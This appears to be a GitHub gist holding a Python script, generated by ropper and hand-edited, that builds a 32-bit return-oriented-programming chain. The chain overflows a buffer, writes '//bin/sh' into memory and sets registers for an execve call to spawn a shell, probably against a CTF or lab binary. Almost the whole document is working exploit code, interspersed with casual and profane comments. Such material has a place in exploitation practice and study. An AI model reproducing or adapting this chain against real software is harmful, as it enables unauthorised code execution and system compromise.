Skip to content

Instantly share code, notes, and snippets.

@CreateRemoteThread
Last active April 4, 2016 13:41
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save CreateRemoteThread/451ab16aa8d2fe4864fc9f53a7ddffb4 to your computer and use it in GitHub Desktop.
fuck you can add descriptions to this shit?
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = "A" * ((0x1000 + 0x20) - 4)
rop += rebase_0(0x00076b26) # pop eax; ret; # OKAY
rop += '//bi'
rop += rebase_0(0x0002a70a) # pop edx; ret; # okay
rop += rebase_0(0x000a6060)
rop += rebase_0(0x00055ead) # mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00076b26) # pop eax; ret;
rop += 'n/sh'
rop += rebase_0(0x0002a70a) # pop edx; ret;
rop += rebase_0(0x000a6064)
rop += rebase_0(0x00055ead) # mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00070b9f) # xor eax, eax; ret;
rop += rebase_0(0x0002a70a) # pop edx; ret;
rop += rebase_0(0x000a6068)
rop += rebase_0(0x00055ead) # mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000001d1) # pop ebx; ret;
rop += rebase_0(0x000a6060)
rop += rebase_0(0x0002a731) # POP ecx, POP edx, ret - had to patch this one because derp push cs
rop += rebase_0(0x000a6068) # wierd, this one broke
rop += rebase_0(0x000a6060) # one extra for pop edx
rop += rebase_0(0x0002a70a) # pop edx; ret;
rop += rebase_0(0x000a6068) # lol
rop += rebase_0(0x00076b26) # pop eax; ret;
rop += p(0xfffffff5)
rop += rebase_0(0x0001a1f7) # neg eax; ret;
rop += "\xCC\xCC\xCC\xCC"
rop += rebase_0(0x0002add0) # yeah idk what happend here
print rop
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment